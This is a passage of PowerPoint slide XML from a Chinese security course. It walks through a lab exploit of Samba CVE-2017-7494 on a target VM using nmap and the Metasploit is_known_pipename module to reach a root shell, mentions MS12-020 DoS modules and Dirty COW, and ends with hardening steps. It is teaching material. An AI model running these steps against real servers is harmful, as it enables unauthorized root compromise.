              <a:t>靶机开启远程桌面协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> (RDP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>和3389端口，网络互连互通。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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295705" y="-203755"/>
              <a:ext cx="1291989"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03</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altLang="zh-CN" sz="40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rPr>
              <a:t>3.3.1 利用CVE-2017-7494漏洞实现Samba远程代码执行</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4416425" y="5194935"/>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lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.3.2 利用CVE-CVE-2016-5195漏洞实现Linux系统本地提权</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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lang="zh-CN" altLang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.3.1 利用CVE-2017-7494漏洞实现Samba远程代码执行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>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lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1、了解LINUX服务漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2、利用CVE-2017-7494漏洞实现Samba远程代码执行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>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lang="zh-CN" altLang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2665">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2665">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Linux是一个基于多用户、多任务、支持多线程和多CPU的操作系统。Linux服务器在网络和计算机系统当中有广泛的应用，可以提供数据库管理和网络服务等内容，是一种性能高且开源的服务器，在计算机应该系统中，有很多采用Linux系统，其使用的范围非常广泛，用户体验反应较好。但LINUX服务也不可避免的存在一些漏洞，攻击者通过利用漏洞给用户带来极大的危害。</a:t>
            </a:r>
            <a:endParaRPr sz="2665">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2665">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>漏洞编号CVE-2017-7494是一个严重的远程代码执行漏洞，攻击者可以利用该漏洞在目标服务器上执行任意代码。漏洞利用条件是服务端共享目录有访问权限以及需要对服务器上写一个恶意文件并知道该文件的物理路径。本项目将通过CVE-2017-7494漏洞实现Samba远程代码执行，从而来介绍Linux服务漏洞。</a:t>
            </a:r>
            <a:endParaRPr sz="2665">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252730" y="106680"/>
            <a:ext cx="11732260" cy="508000"/>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2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200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>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911225" y="1676400"/>
            <a:ext cx="10459085" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Samba服务是在Linux和UNIX系统上实现SMB协议的一个免费软件，由服务器及客户端程序构成。SMB是在局域网上共享文件和打印机的一种通信协议，它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议，客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源，还能与因特网上的远程主机分享资源。</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CVE-2017-7494安全漏洞出现在smbd守护进程，能够被恶意的samba客户端利用，允许攻击者远程执行恶意代码，攻击者通过发送一个恶意构造的代码到samba服务器，不需经过认证，便能够导使远程服务器以root权限执行任意命令。</a:t>
            </a:r>
            <a:endParaRPr sz="24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1699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sz="2400" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  网络管理员小王最近在网络上看到一则有关LINUX系统Samba服务的漏洞消息，出于专业的敏锐性，他马上对公司的LINUX服务器进行检查测试，结果发现服务器正好存在网络上所说的Samba服务漏洞，漏洞代码CVE-2017-7494，于是他立刻对服务器进行了加固，重新安装和升级了更高版本的Samba服务，确保服务器的安全运行。</a:t>
            </a:r>
            <a:endParaRPr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6127115" cy="1420495"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="826135"/>
                <a:gridCol w="1927225"/>
                <a:gridCol w="2315210"/>
                <a:gridCol w="105854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CenterOS6-1</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192.138.66.40</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靶机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948690" y="4390390"/>
            <a:ext cx="6816725" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>靶机安装smaba服务器，开启139、445端口，确保网络互连互通。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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2900"/>
            <a:ext cx="10515600" cy="5961380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>步骤二，CVE-2017-7494漏洞利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1. 在Kali Linux终端用nmap 192.168.66.40扫描目标靶机是否开启139、445端口，445端口作为Samba服务，139作为获取Samba服务,如图3-3-1所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3236595" y="6184265"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-3-1 扫描目标靶机端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 118"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1492885" y="2072005"/>
            <a:ext cx="7717790" cy="3773170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">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48665" y="189865"/>
            <a:ext cx="10515600" cy="5276215"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>2.在Kali Linux终端界面中输入“msfconsole”命令，打开Metasploit框架，如图3-3-2所示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 119"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1823085" y="1106170"/>
            <a:ext cx="8347075" cy="3801745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3456305" y="529590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3-3-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>打开Metasploit框架</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="0201060003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56235"/>
            <a:ext cx="10515600" cy="5821045"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>3.使用search搜索可利用的漏洞，输入“search is_known_pipename”命令搜索is_known_pipename漏洞模块，显示exploit/linux/samba/is_known_pipename可利用模块，如图3-3-3所示。。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 120"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1691640" y="1758315"/>
            <a:ext cx="7948295" cy="3456940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3357245" y="5593715"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="266700"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3-3-3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>搜索漏洞利用模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="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2900"/>
            <a:ext cx="10515600" cy="5961380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.使用search搜索可利用的漏洞，输入“search  ms12-020”命令搜索ms12-020漏洞模块，如图3-1-2所示，显示两个可利用模块。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞检测模块 auxiliary/scanner/rdp/ms12_020_check</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞攻击模块  auxiliary/dos/windows/rdp/ms12_020_maxchannelids</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482623" descr="图3-1-2搜索MS12-020"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1238250" y="2647950"/>
            <a:ext cx="7823835" cy="3390900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>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32435"/>
            <a:ext cx="10515600" cy="5923915"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>4.使用“use exploit/linux/samba/is_known_pipename”漏洞模块，用“show options”命令查看配置参数，如图3-3-4所示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 121"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1473835" y="1551305"/>
            <a:ext cx="8134350" cy="3706495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3109595" y="5593715"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-3-4使用搜索漏洞模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>5.设置目标靶机IP 192.168.66.40，端口445，执行攻击后，看到成功获得sesions会话为1，然后成功进入到metermter的shell界面获取了用户最高权限，可远程执行任何代码，如图3-3-5所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3009900" y="5826125"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-3-5执行攻击获取shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 122"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1428115" y="1483360"/>
            <a:ext cx="9221470" cy="4122420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">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54635"/>
            <a:ext cx="10515600" cy="5922645"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>6.远程执行命令，在kali和目标打靶机都输入who命令，然后进行对比是否一样，结果效果是一样的，说明远程攻击机已获取了靶机的最高用户root权限，如图3-3-6和图3-3-7所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 123"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409065" y="1581150"/>
            <a:ext cx="5123815" cy="3435350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041400" y="529590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3-3-6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在攻击机上运行的结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 124"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6787515" y="1713865"/>
            <a:ext cx="4871085" cy="3302635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6273800" y="529590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3-3-7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在靶机运行的结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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7960"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>步骤三，漏洞加固措施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1、使用samba最新版本；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2、在smb.conf的[global]阶段下增加nt pipe support = no，重启samba服务。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>vim /etc/samba/smb.conf </a:t>
